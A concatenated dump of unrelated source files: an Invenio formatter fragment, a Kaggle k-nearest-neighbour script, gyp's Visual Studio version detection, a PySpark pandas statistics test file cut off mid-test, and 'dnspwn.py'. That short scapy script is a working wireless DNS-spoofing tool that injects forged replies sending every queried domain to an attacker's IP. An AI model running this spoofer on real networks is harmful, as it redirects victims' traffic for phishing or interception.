except (TypeError, KeyError):
pass
if isinstance(data, string_types):
# We can try formatter!
# If already XML, format_record does not like it.
if of and of != 'xm':
try:
from invenio.modules.formatter import format_record
formatted_data = format_record(
recID=None,
of=of,
xml_record=data
)
except TypeError:
# Wrong kind of type
pass
else:
# So, XML then
from xml.dom.minidom import parseString
try:
unpretty_data = parseString(data)
formatted_data = unpretty_data.toprettyxml()
except TypeError:
# Probably not proper XML string then
return "Data cannot be parsed: %s" % (data,)
except Exception:
# Just return raw string
pass
if not formatted_data:
formatted_data = data
if isinstance(formatted_data, dict):
formatted_data = pformat(formatted_data)
return formatted_data
| gpl-2.0 |
noelevans/sandpit | kaggle/washington_bike_share/knn_normalising.py | 1 | 3166 | import datetime
import logging
import math
import random
import pandas as pd
logging.basicConfig(level=logging.INFO)
INPUT_FIELDS = ('holiday', 'workingday', 'temp', 'atemp', 'humidity',
'windspeed', 'hour', 'day_of_year', 'day_of_week')
PERIODICS = ('hour', 'day_of_year', 'day_of_week')
RESULT_FIELD = 'count'
def normalise(df, normalise=[]):
mins = dict((field, min(df[field])) for field in normalise)
maxes = dict((field, max(df[field])) for field in normalise)
for field in normalise:
f = lambda x: float(x - mins[field]) / (maxes[field] - mins[field])
df[field] = map(f, df[field])
return df
def load_and_munge_training_data(filename):
parse_hour = lambda dt: int(dt.split()[1].split(':')[0])
parse_day_of_week = lambda dt: parse_date(dt).weekday()
def parse_date(dt):
return datetime.date(*(int(x) for x in dt.split()[0].split('-')))
def parse_day_of_year(dt):
_date = parse_date(dt)
year_start = datetime.date(_date.year, 1, 1)
return (_date - year_start).days
df = pd.read_csv(open(filename))
df['hour'] = map(parse_hour, df['datetime'])
df['day_of_year'] = map(parse_day_of_year, df['datetime'])
df['day_of_week'] = map(parse_day_of_week, df['datetime'])
return normalise(df, INPUT_FIELDS)
def euclidean_dist(a, b):
diff = lambda m, n, field: (m - n) % 1 if field in PERIODICS else m - n
return math.sqrt(sum((diff(a[f], b[f], f)**2 for f in INPUT_FIELDS)))
def shuffle(df):
length = len(df)
chosen_indices = random.sample(range(length), length)
return df.irow(chosen_indices)
def most_influential(training, fields):
def homogeneity(field):
return training.groupby(field)[RESULT_FIELD].apply(np.std).sum()
return sorted((homogeneity(f), f) for f in fields)[0][1]
def knn(vector, neighbours, k=3):
ds = [(euclidean_dist(vector, n), n) for _, n in neighbours.iterrows()]
return sorted(ds, key=lambda a: a[0])[:k]
def gaussian_weight(dist, sigma=12.0):
return math.exp(-dist**2/(2*sigma**2))
def estimate(test, training):
neighbour_dists = knn(test, training)
weights = [(gaussian_weight(d), n) for d, n in neighbour_dists]
sum_weights = sum(w for w, _ in weights)
mean = sum(w * n[RESULT_FIELD] for w, n in weights) / sum_weights
return int(mean)
def main():
dry_run = False
all_train = load_and_munge_training_data('train.csv')
if dry_run:
train_on = 0.6
all_train = shuffle(all_train)
split = int(train_on * len(all_train))
train = all_train[: split]
test = all_train[split+1:]
else:
train = all_train
test = load_and_munge_training_data('test.csv')
filename = 'knn-normalising.csv'
with open(filename, 'w') as f:
f.write('datetime,count\n')
for n, t in test.iterrows():
f.write('%s,%i\n' % (t['datetime'], estimate(t, train)))
print '%s,%i' % (t['datetime'], estimate(t, train))
if __name__ == '__main__':
main()
| mit |
gyyu/cmu-debate | node_modules/node-gyp/gyp/pylib/gyp/MSVSVersion.py | 1509 | 17165 | # Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Handle version information related to Visual Stuio."""
import errno
import os
import re
import subprocess
import sys
import gyp
import glob
class VisualStudioVersion(object):
"""Information regarding a version of Visual Studio."""
def __init__(self, short_name, description,
solution_version, project_version, flat_sln, uses_vcxproj,
path, sdk_based, default_toolset=None):
self.short_name = short_name
self.description = description
self.solution_version = solution_version
self.project_version = project_version
self.flat_sln = flat_sln
self.uses_vcxproj = uses_vcxproj
self.path = path
self.sdk_based = sdk_based
self.default_toolset = default_toolset
def ShortName(self):
return self.short_name
def Description(self):
"""Get the full description of the version."""
return self.description
def SolutionVersion(self):
"""Get the version number of the sln files."""
return self.solution_version
def ProjectVersion(self):
"""Get the version number of the vcproj or vcxproj files."""
return self.project_version
def FlatSolution(self):
return self.flat_sln
def UsesVcxproj(self):
"""Returns true if this version uses a vcxproj file."""
return self.uses_vcxproj
def ProjectExtension(self):
"""Returns the file extension for the project."""
return self.uses_vcxproj and '.vcxproj' or '.vcproj'
def Path(self):
"""Returns the path to Visual Studio installation."""
return self.path
def ToolPath(self, tool):
"""Returns the path to a given compiler tool. """
return os.path.normpath(os.path.join(self.path, "VC/bin", tool))
def DefaultToolset(self):
"""Returns the msbuild toolset version that will be used in the absence
of a user override."""
return self.default_toolset
def SetupScript(self, target_arch):
"""Returns a command (with arguments) to be used to set up the
environment."""
# Check if we are running in the SDK command line environment and use
# the setup script from the SDK if so. |target_arch| should be either
# 'x86' or 'x64'.
assert target_arch in ('x86', 'x64')
sdk_dir = os.environ.get('WindowsSDKDir')
if self.sdk_based and sdk_dir:
return [os.path.normpath(os.path.join(sdk_dir, 'Bin/SetEnv.Cmd')),
'/' + target_arch]
else:
# We don't use VC/vcvarsall.bat for x86 because vcvarsall calls
# vcvars32, which it can only find if VS??COMNTOOLS is set, which it
# isn't always.
if target_arch == 'x86':
if self.short_name >= '2013' and self.short_name[-1] != 'e' and (
os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
# VS2013 and later, non-Express have a x64-x86 cross that we want
# to prefer.
return [os.path.normpath(
os.path.join(self.path, 'VC/vcvarsall.bat')), 'amd64_x86']
# Otherwise, the standard x86 compiler.
return [os.path.normpath(
os.path.join(self.path, 'Common7/Tools/vsvars32.bat'))]
else:
assert target_arch == 'x64'
arg = 'x86_amd64'
# Use the 64-on-64 compiler if we're not using an express
# edition and we're running on a 64bit OS.
if self.short_name[-1] != 'e' and (
os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
arg = 'amd64'
return [os.path.normpath(
os.path.join(self.path, 'VC/vcvarsall.bat')), arg]
def _RegistryQueryBase(sysdir, key, value):
"""Use reg.exe to read a particular key.
While ideally we might use the win32 module, we would like gyp to be
python neutral, so for instance cygwin python lacks this module.
Arguments:
sysdir: The system subdirectory to attempt to launch reg.exe from.
key: The registry key to read from.
value: The particular value to read.
Return:
stdout from reg.exe, or None for failure.
"""
# Skip if not on Windows or Python Win32 setup issue
if sys.platform not in ('win32', 'cygwin'):
return None
# Setup params to pass to and attempt to launch reg.exe
cmd = [os.path.join(os.environ.get('WINDIR', ''), sysdir, 'reg.exe'),
'query', key]
if value:
cmd.extend(['/v', value])
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Obtain the stdout from reg.exe, reading to the end so p.returncode is valid
# Note that the error text may be in [1] in some cases
text = p.communicate()[0]
# Check return code from reg.exe; officially 0==success and 1==error
if p.returncode:
return None
return text
def _RegistryQuery(key, value=None):
r"""Use reg.exe to read a particular key through _RegistryQueryBase.
First tries to launch from %WinDir%\Sysnative to avoid WoW64 redirection. If
that fails, it falls back to System32. Sysnative is available on Vista and
up and available on Windows Server 2003 and XP through KB patch 942589. Note
that Sysnative will always fail if using 64-bit python due to it being a
virtual directory and System32 will work correctly in the first place.
KB 942589 - http://support.microsoft.com/kb/942589/en-us.
Arguments:
key: The registry key.
value: The particular registry value to read (optional).
Return:
stdout from reg.exe, or None for failure.
"""
text = None
try:
text = _RegistryQueryBase('Sysnative', key, value)
except OSError, e:
if e.errno == errno.ENOENT:
text = _RegistryQueryBase('System32', key, value)
else:
raise
return text
def _RegistryGetValueUsingWinReg(key, value):
"""Use the _winreg module to obtain the value of a registry key.
Args:
key: The registry key.
value: The particular registry value to read.
Return:
contents of the registry key's value, or None on failure. Throws
ImportError if _winreg is unavailable.
"""
import _winreg
try:
root, subkey = key.split('\\', 1)
assert root == 'HKLM' # Only need HKLM for now.
with _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, subkey) as hkey:
return _winreg.QueryValueEx(hkey, value)[0]
except WindowsError:
return None
def _RegistryGetValue(key, value):
"""Use _winreg or reg.exe to obtain the value of a registry key.
Using _winreg is preferable because it solves an issue on some corporate
environments where access to reg.exe is locked down. However, we still need
to fallback to reg.exe for the case where the _winreg module is not available
(for example in cygwin python).
Args:
key: The registry key.
value: The particular registry value to read.
Return:
contents of the registry key's value, or None on failure.
"""
try:
return _RegistryGetValueUsingWinReg(key, value)
except ImportError:
pass
# Fallback to reg.exe if we fail to import _winreg.
text = _RegistryQuery(key, value)
if not text:
return None
# Extract value.
match = re.search(r'REG_\w+\s+([^\r]+)\r\n', text)
if not match:
return None
return match.group(1)
def _CreateVersion(name, path, sdk_based=False):
"""Sets up MSVS project generation.
Setup is based off the GYP_MSVS_VERSION environment variable or whatever is
autodetected if GYP_MSVS_VERSION is not explicitly specified. If a version is
passed in that doesn't match a value in versions python will throw a error.
"""
if path:
path = os.path.normpath(path)
versions = {
'2015': VisualStudioVersion('2015',
'Visual Studio 2015',
solution_version='12.00',
project_version='14.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v140'),
'2013': VisualStudioVersion('2013',
'Visual Studio 2013',
solution_version='13.00',
project_version='12.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v120'),
'2013e': VisualStudioVersion('2013e',
'Visual Studio 2013',
solution_version='13.00',
project_version='12.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v120'),
'2012': VisualStudioVersion('2012',
'Visual Studio 2012',
solution_version='12.00',
project_version='4.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v110'),
'2012e': VisualStudioVersion('2012e',
'Visual Studio 2012',
solution_version='12.00',
project_version='4.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v110'),
'2010': VisualStudioVersion('2010',
'Visual Studio 2010',
solution_version='11.00',
project_version='4.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based),
'2010e': VisualStudioVersion('2010e',
'Visual C++ Express 2010',
solution_version='11.00',
project_version='4.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based),
'2008': VisualStudioVersion('2008',
'Visual Studio 2008',
solution_version='10.00',
project_version='9.00',
flat_sln=False,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2008e': VisualStudioVersion('2008e',
'Visual Studio 2008',
solution_version='10.00',
project_version='9.00',
flat_sln=True,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2005': VisualStudioVersion('2005',
'Visual Studio 2005',
solution_version='9.00',
project_version='8.00',
flat_sln=False,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2005e': VisualStudioVersion('2005e',
'Visual Studio 2005',
solution_version='9.00',
project_version='8.00',
flat_sln=True,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
}
return versions[str(name)]
def _ConvertToCygpath(path):
"""Convert to cygwin path if we are using cygwin."""
if sys.platform == 'cygwin':
p = subprocess.Popen(['cygpath', path], stdout=subprocess.PIPE)
path = p.communicate()[0].strip()
return path
def _DetectVisualStudioVersions(versions_to_check, force_express):
"""Collect the list of installed visual studio versions.
Returns:
A list of visual studio versions installed in descending order of
usage preference.
Base this on the registry and a quick check if devenv.exe exists.
Only versions 8-10 are considered.
Possibilities are:
2005(e) - Visual Studio 2005 (8)
2008(e) - Visual Studio 2008 (9)
2010(e) - Visual Studio 2010 (10)
2012(e) - Visual Studio 2012 (11)
2013(e) - Visual Studio 2013 (12)
2015 - Visual Studio 2015 (14)
Where (e) is e for express editions of MSVS and blank otherwise.
"""
version_to_year = {
'8.0': '2005',
'9.0': '2008',
'10.0': '2010',
'11.0': '2012',
'12.0': '2013',
'14.0': '2015',
}
versions = []
for version in versions_to_check:
# Old method of searching for which VS version is installed
# We don't use the 2010-encouraged-way because we also want to get the
# path to the binaries, which it doesn't offer.
keys = [r'HKLM\Software\Microsoft\VisualStudio\%s' % version,
r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\%s' % version,
r'HKLM\Software\Microsoft\VCExpress\%s' % version,
r'HKLM\Software\Wow6432Node\Microsoft\VCExpress\%s' % version]
for index in range(len(keys)):
path = _RegistryGetValue(keys[index], 'InstallDir')
if not path:
continue
path = _ConvertToCygpath(path)
# Check for full.
full_path = os.path.join(path, 'devenv.exe')
express_path = os.path.join(path, '*express.exe')
if not force_express and os.path.exists(full_path):
# Add this one.
versions.append(_CreateVersion(version_to_year[version],
os.path.join(path, '..', '..')))
# Check for express.
elif glob.glob(express_path):
# Add this one.
versions.append(_CreateVersion(version_to_year[version] + 'e',
os.path.join(path, '..', '..')))
# The old method above does not work when only SDK is installed.
keys = [r'HKLM\Software\Microsoft\VisualStudio\SxS\VC7',
r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\SxS\VC7']
for index in range(len(keys)):
path = _RegistryGetValue(keys[index], version)
if not path:
continue
path = _ConvertToCygpath(path)
if version != '14.0': # There is no Express edition for 2015.
versions.append(_CreateVersion(version_to_year[version] + 'e',
os.path.join(path, '..'), sdk_based=True))
return versions
def SelectVisualStudioVersion(version='auto', allow_fallback=True):
"""Select which version of Visual Studio projects to generate.
Arguments:
version: Hook to allow caller to force a particular version (vs auto).
Returns:
An object representing a visual studio project format version.
"""
# In auto mode, check environment variable for override.
if version == 'auto':
version = os.environ.get('GYP_MSVS_VERSION', 'auto')
version_map = {
'auto': ('14.0', '12.0', '10.0', '9.0', '8.0', '11.0'),
'2005': ('8.0',),
'2005e': ('8.0',),
'2008': ('9.0',),
'2008e': ('9.0',),
'2010': ('10.0',),
'2010e': ('10.0',),
'2012': ('11.0',),
'2012e': ('11.0',),
'2013': ('12.0',),
'2013e': ('12.0',),
'2015': ('14.0',),
}
override_path = os.environ.get('GYP_MSVS_OVERRIDE_PATH')
if override_path:
msvs_version = os.environ.get('GYP_MSVS_VERSION')
if not msvs_version:
raise ValueError('GYP_MSVS_OVERRIDE_PATH requires GYP_MSVS_VERSION to be '
'set to a particular version (e.g. 2010e).')
return _CreateVersion(msvs_version, override_path, sdk_based=True)
version = str(version)
versions = _DetectVisualStudioVersions(version_map[version], 'e' in version)
if not versions:
if not allow_fallback:
raise ValueError('Could not locate Visual Studio installation.')
if version == 'auto':
# Default to 2005 if we couldn't find anything
return _CreateVersion('2005', None)
else:
return _CreateVersion(version, None)
return versions[0]
| mit |
jordan-wright/python-wireless-attacks | dnspwn.py | 2 | 1605 | from scapy.all import *
import time
import logging
logger = logging.getLogger('main')
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)
logger.setLevel(logging.DEBUG)
# Set the interface for scapy to use
conf.iface = 'mon0'
# Set the spoofed response
spoofed_ip = 'x.x.x.x'
def send_response(x):
req_domain = x[DNS].qd.qname
logger.info('Found request for ' + req_domain)
# First, we delete the existing lengths and checksums..
# We will let Scapy re-create them
del(x[UDP].len)
del(x[UDP].chksum)
del(x[IP].len)
del(x[IP].chksum)
# Let's build our response from a copy of the original packet
response = x.copy()
# Let's work our way up the layers!
# We need to start by changing our response to be "from-ds", or from the access point.
response.FCfield = 2L
# Switch the MAC addresses
response.addr1, response.addr2 = x.addr2, x.addr1
# Switch the IP addresses
response.src, response.dst = x.dst, x.src
# Switch the ports
response.sport, response.dport = x.dport, x.sport
# Set the DNS flags
response[DNS].qr = 1L
response[DNS].ra = 1L
response[DNS].ancount = 1
# Let's add on the answer section
response[DNS].an = DNSRR(
rrname = req_domain,
type = 'A',
rclass = 'IN',
ttl = 900,
rdata = spoofed_ip
)
# Now, we inject the response!
sendp(response)
logger.info('Sent response: ' + req_domain + ' -> ' + spoofed_ip + '\n')
def main():
logger.info('Starting to intercept [CTRL+C to stop]')
sniff(prn=lambda x: send_response(x), lfilter=lambda x:x.haslayer(UDP) and x.dport == 53)
if __name__ == "__main__":
# Make it happen!
main() | mit |
wangmiao1981/spark | python/pyspark/pandas/tests/test_stats.py | 6 | 18881 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from distutils.version import LooseVersion
import numpy as np
import pandas as pd
try:
from pandas._testing import makeMissingDataframe
except ImportError:
from pandas.util.testing import makeMissingDataframe
from pyspark import pandas as ps
from pyspark.pandas.config import option_context
from pyspark.testing.pandasutils import PandasOnSparkTestCase, SPARK_CONF_ARROW_ENABLED
from pyspark.testing.sqlutils import SQLTestUtils
class StatsTest(PandasOnSparkTestCase, SQLTestUtils):
def _test_stat_functions(self, pdf_or_pser, psdf_or_psser):
functions = ["max", "min", "mean", "sum", "count"]
for funcname in functions:
self.assert_eq(getattr(psdf_or_psser, funcname)(), getattr(pdf_or_pser, funcname)())
functions = ["std", "var", "product", "sem"]
for funcname in functions:
self.assert_eq(
getattr(psdf_or_psser, funcname)(),
getattr(pdf_or_pser, funcname)(),
check_exact=False,
)
functions = ["std", "var", "sem"]
for funcname in functions:
self.assert_eq(
getattr(psdf_or_psser, funcname)(ddof=0),
getattr(pdf_or_pser, funcname)(ddof=0),
check_exact=False,
)
# NOTE: To test skew, kurt, and median, just make sure they run.
# The numbers are different in spark and pandas.
functions = ["skew", "kurt", "median"]
for funcname in functions:
getattr(psdf_or_psser, funcname)()
def test_stat_functions(self):
pdf = pd.DataFrame({"A": [1, 2, 3, 4], "B": [1, 2, 3, 4], "C": [1, np.nan, 3, np.nan]})
psdf = ps.from_pandas(pdf)
self._test_stat_functions(pdf.A, psdf.A)
self._test_stat_functions(pdf, psdf)
# empty
self._test_stat_functions(pdf.A.loc[[]], psdf.A.loc[[]])
self._test_stat_functions(pdf.loc[[]], psdf.loc[[]])
def test_stat_functions_multiindex_column(self):
arrays = [np.array(["A", "A", "B", "B"]), np.array(["one", "two", "one", "two"])]
pdf = pd.DataFrame(np.random.randn(3, 4), index=["A", "B", "C"], columns=arrays)
psdf = ps.from_pandas(pdf)
self._test_stat_functions(pdf.A, psdf.A)
self._test_stat_functions(pdf, psdf)
def test_stat_functions_with_no_numeric_columns(self):
pdf = pd.DataFrame(
{
"A": ["a", None, "c", "d", None, "f", "g"],
"B": ["A", "B", "C", None, "E", "F", None],
}
)
psdf = ps.from_pandas(pdf)
self._test_stat_functions(pdf, psdf)
def test_sum(self):
pdf = pd.DataFrame({"a": [1, 2, 3, np.nan], "b": [0.1, np.nan, 0.3, np.nan]})
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.sum(), pdf.sum())
self.assert_eq(psdf.sum(axis=1), pdf.sum(axis=1))
self.assert_eq(psdf.sum(min_count=3), pdf.sum(min_count=3))
self.assert_eq(psdf.sum(axis=1, min_count=1), pdf.sum(axis=1, min_count=1))
self.assert_eq(psdf.loc[[]].sum(), pdf.loc[[]].sum())
self.assert_eq(psdf.loc[[]].sum(min_count=1), pdf.loc[[]].sum(min_count=1))
self.assert_eq(psdf["a"].sum(), pdf["a"].sum())
self.assert_eq(psdf["a"].sum(min_count=3), pdf["a"].sum(min_count=3))
self.assert_eq(psdf["b"].sum(min_count=3), pdf["b"].sum(min_count=3))
self.assert_eq(psdf["a"].loc[[]].sum(), pdf["a"].loc[[]].sum())
self.assert_eq(psdf["a"].loc[[]].sum(min_count=1), pdf["a"].loc[[]].sum(min_count=1))
def test_product(self):
pdf = pd.DataFrame(
{"a": [1, -2, -3, np.nan], "b": [0.1, np.nan, -0.3, np.nan], "c": [10, 20, 0, -10]}
)
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.product(), pdf.product(), check_exact=False)
self.assert_eq(psdf.product(axis=1), pdf.product(axis=1))
self.assert_eq(psdf.product(min_count=3), pdf.product(min_count=3), check_exact=False)
self.assert_eq(psdf.product(axis=1, min_count=1), pdf.product(axis=1, min_count=1))
self.assert_eq(psdf.loc[[]].product(), pdf.loc[[]].product())
self.assert_eq(psdf.loc[[]].product(min_count=1), pdf.loc[[]].product(min_count=1))
self.assert_eq(psdf["a"].product(), pdf["a"].product(), check_exact=False)
self.assert_eq(
psdf["a"].product(min_count=3), pdf["a"].product(min_count=3), check_exact=False
)
self.assert_eq(psdf["b"].product(min_count=3), pdf["b"].product(min_count=3))
self.assert_eq(psdf["c"].product(min_count=3), pdf["c"].product(min_count=3))
self.assert_eq(psdf["a"].loc[[]].product(), pdf["a"].loc[[]].product())
self.assert_eq(
psdf["a"].loc[[]].product(min_count=1), pdf["a"].loc[[]].product(min_count=1)
)
def test_abs(self):
pdf = pd.DataFrame(
{
"A": [1, -2, np.nan, -4, 5],
"B": [1.0, -2, np.nan, -4, 5],
"C": [-6.0, -7, -8, np.nan, 10],
"D": ["a", "b", "c", "d", np.nan],
"E": [True, np.nan, False, True, True],
}
)
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.A.abs(), pdf.A.abs())
self.assert_eq(psdf.B.abs(), pdf.B.abs())
self.assert_eq(psdf.E.abs(), pdf.E.abs())
# pandas' bug?
# self.assert_eq(psdf[["B", "C", "E"]].abs(), pdf[["B", "C", "E"]].abs())
self.assert_eq(psdf[["B", "C"]].abs(), pdf[["B", "C"]].abs())
self.assert_eq(psdf[["E"]].abs(), pdf[["E"]].abs())
with self.assertRaisesRegex(
TypeError, "bad operand type for abs\\(\\): object \\(string\\)"
):
psdf.abs()
with self.assertRaisesRegex(
TypeError, "bad operand type for abs\\(\\): object \\(string\\)"
):
psdf.D.abs()
def test_axis_on_dataframe(self):
# The number of each count is intentionally big
# because when data is small, it executes a shortcut.
# Less than 'compute.shortcut_limit' will execute a shortcut
# by using collected pandas dataframe directly.
# now we set the 'compute.shortcut_limit' as 1000 explicitly
with option_context("compute.shortcut_limit", 1000):
pdf = pd.DataFrame(
{
"A": [1, -2, 3, -4, 5] * 300,
"B": [1.0, -2, 3, -4, 5] * 300,
"C": [-6.0, -7, -8, -9, 10] * 300,
"D": [True, False, True, False, False] * 300,
},
index=range(10, 15001, 10),
)
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.count(axis=1), pdf.count(axis=1))
self.assert_eq(psdf.var(axis=1), pdf.var(axis=1))
self.assert_eq(psdf.var(axis=1, ddof=0), pdf.var(axis=1, ddof=0))
self.assert_eq(psdf.std(axis=1), pdf.std(axis=1))
self.assert_eq(psdf.std(axis=1, ddof=0), pdf.std(axis=1, ddof=0))
self.assert_eq(psdf.max(axis=1), pdf.max(axis=1))
self.assert_eq(psdf.min(axis=1), pdf.min(axis=1))
self.assert_eq(psdf.sum(axis=1), pdf.sum(axis=1))
self.assert_eq(psdf.product(axis=1), pdf.product(axis=1))
self.assert_eq(psdf.kurtosis(axis=1), pdf.kurtosis(axis=1))
self.assert_eq(psdf.skew(axis=1), pdf.skew(axis=1))
self.assert_eq(psdf.mean(axis=1), pdf.mean(axis=1))
self.assert_eq(psdf.sem(axis=1), pdf.sem(axis=1))
self.assert_eq(psdf.sem(axis=1, ddof=0), pdf.sem(axis=1, ddof=0))
self.assert_eq(
psdf.count(axis=1, numeric_only=True), pdf.count(axis=1, numeric_only=True)
)
self.assert_eq(psdf.var(axis=1, numeric_only=True), pdf.var(axis=1, numeric_only=True))
self.assert_eq(
psdf.var(axis=1, ddof=0, numeric_only=True),
pdf.var(axis=1, ddof=0, numeric_only=True),
)
self.assert_eq(psdf.std(axis=1, numeric_only=True), pdf.std(axis=1, numeric_only=True))
self.assert_eq(
psdf.std(axis=1, ddof=0, numeric_only=True),
pdf.std(axis=1, ddof=0, numeric_only=True),
)
self.assert_eq(
psdf.max(axis=1, numeric_only=True),
pdf.max(axis=1, numeric_only=True).astype(float),
)
self.assert_eq(
psdf.min(axis=1, numeric_only=True),
pdf.min(axis=1, numeric_only=True).astype(float),
)
self.assert_eq(
psdf.sum(axis=1, numeric_only=True),
pdf.sum(axis=1, numeric_only=True).astype(float),
)
self.assert_eq(
psdf.product(axis=1, numeric_only=True),
pdf.product(axis=1, numeric_only=True).astype(float),
)
self.assert_eq(
psdf.kurtosis(axis=1, numeric_only=True), pdf.kurtosis(axis=1, numeric_only=True)
)
self.assert_eq(
psdf.skew(axis=1, numeric_only=True), pdf.skew(axis=1, numeric_only=True)
)
self.assert_eq(
psdf.mean(axis=1, numeric_only=True), pdf.mean(axis=1, numeric_only=True)
)
self.assert_eq(psdf.sem(axis=1, numeric_only=True), pdf.sem(axis=1, numeric_only=True))
self.assert_eq(
psdf.sem(axis=1, ddof=0, numeric_only=True),
pdf.sem(axis=1, ddof=0, numeric_only=True),
)
def test_corr(self):
# Disable arrow execution since corr() is using UDT internally which is not supported.
with self.sql_conf({SPARK_CONF_ARROW_ENABLED: False}):
# DataFrame
# we do not handle NaNs for now
pdf = makeMissingDataframe(0.3, 42).fillna(0)
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.corr(), pdf.corr(), check_exact=False)
# Series
pser_a = pdf.A
pser_b = pdf.B
psser_a = psdf.A
psser_b = psdf.B
self.assertAlmostEqual(psser_a.corr(psser_b), pser_a.corr(pser_b))
self.assertRaises(TypeError, lambda: psser_a.corr(psdf))
# multi-index columns
columns = pd.MultiIndex.from_tuples([("X", "A"), ("X", "B"), ("Y", "C"), ("Z", "D")])
pdf.columns = columns
psdf.columns = columns
self.assert_eq(psdf.corr(), pdf.corr(), check_exact=False)
# Series
pser_xa = pdf[("X", "A")]
pser_xb = pdf[("X", "B")]
psser_xa = psdf[("X", "A")]
psser_xb = psdf[("X", "B")]
self.assert_eq(psser_xa.corr(psser_xb), pser_xa.corr(pser_xb), almost=True)
def test_cov_corr_meta(self):
# Disable arrow execution since corr() is using UDT internally which is not supported.
with self.sql_conf({SPARK_CONF_ARROW_ENABLED: False}):
pdf = pd.DataFrame(
{
"a": np.array([1, 2, 3], dtype="i1"),
"b": np.array([1, 2, 3], dtype="i2"),
"c": np.array([1, 2, 3], dtype="i4"),
"d": np.array([1, 2, 3]),
"e": np.array([1.0, 2.0, 3.0], dtype="f4"),
"f": np.array([1.0, 2.0, 3.0]),
"g": np.array([True, False, True]),
"h": np.array(list("abc")),
},
index=pd.Index([1, 2, 3], name="myindex"),
)
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.corr(), pdf.corr())
def test_stats_on_boolean_dataframe(self):
pdf = pd.DataFrame({"A": [True, False, True], "B": [False, False, True]})
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.min(), pdf.min())
self.assert_eq(psdf.max(), pdf.max())
self.assert_eq(psdf.count(), pdf.count())
self.assert_eq(psdf.sum(), pdf.sum())
self.assert_eq(psdf.product(), pdf.product())
self.assert_eq(psdf.mean(), pdf.mean())
self.assert_eq(psdf.var(), pdf.var(), check_exact=False)
self.assert_eq(psdf.var(ddof=0), pdf.var(ddof=0), check_exact=False)
self.assert_eq(psdf.std(), pdf.std(), check_exact=False)
self.assert_eq(psdf.std(ddof=0), pdf.std(ddof=0), check_exact=False)
self.assert_eq(psdf.sem(), pdf.sem(), check_exact=False)
self.assert_eq(psdf.sem(ddof=0), pdf.sem(ddof=0), check_exact=False)
def test_stats_on_boolean_series(self):
pser = pd.Series([True, False, True])
psser = ps.from_pandas(pser)
self.assert_eq(psser.min(), pser.min())
self.assert_eq(psser.max(), pser.max())
self.assert_eq(psser.count(), pser.count())
self.assert_eq(psser.sum(), pser.sum())
self.assert_eq(psser.product(), pser.product())
self.assert_eq(psser.mean(), pser.mean())
self.assert_eq(psser.var(), pser.var(), almost=True)
self.assert_eq(psser.var(ddof=0), pser.var(ddof=0), almost=True)
self.assert_eq(psser.std(), pser.std(), almost=True)
self.assert_eq(psser.std(ddof=0), pser.std(ddof=0), almost=True)
self.assert_eq(psser.sem(), pser.sem(), almost=True)
self.assert_eq(psser.sem(ddof=0), pser.sem(ddof=0), almost=True)
def test_stats_on_non_numeric_columns_should_be_discarded_if_numeric_only_is_true(self):
pdf = pd.DataFrame({"i": [0, 1, 2], "b": [False, False, True], "s": ["x", "y", "z"]})
psdf = ps.from_pandas(pdf)
self.assert_eq(
psdf[["i", "s"]].max(numeric_only=True), pdf[["i", "s"]].max(numeric_only=True)
)
self.assert_eq(
psdf[["b", "s"]].max(numeric_only=True), pdf[["b", "s"]].max(numeric_only=True)
)
self.assert_eq(
psdf[["i", "s"]].min(numeric_only=True), pdf[["i", "s"]].min(numeric_only=True)
)
self.assert_eq(
psdf[["b", "s"]].min(numeric_only=True), pdf[["b", "s"]].min(numeric_only=True)
)
self.assert_eq(psdf.count(numeric_only=True), pdf.count(numeric_only=True))
if LooseVersion(pd.__version__) >= LooseVersion("1.0.0"):
self.assert_eq(psdf.sum(numeric_only=True), pdf.sum(numeric_only=True))
self.assert_eq(psdf.product(numeric_only=True), pdf.product(numeric_only=True))
else:
self.assert_eq(psdf.sum(numeric_only=True), pdf.sum(numeric_only=True).astype(int))
self.assert_eq(
psdf.product(numeric_only=True), pdf.product(numeric_only=True).astype(int)
)
self.assert_eq(psdf.mean(numeric_only=True), pdf.mean(numeric_only=True))
self.assert_eq(psdf.var(numeric_only=True), pdf.var(numeric_only=True), check_exact=False)
self.assert_eq(
psdf.var(ddof=0, numeric_only=True),
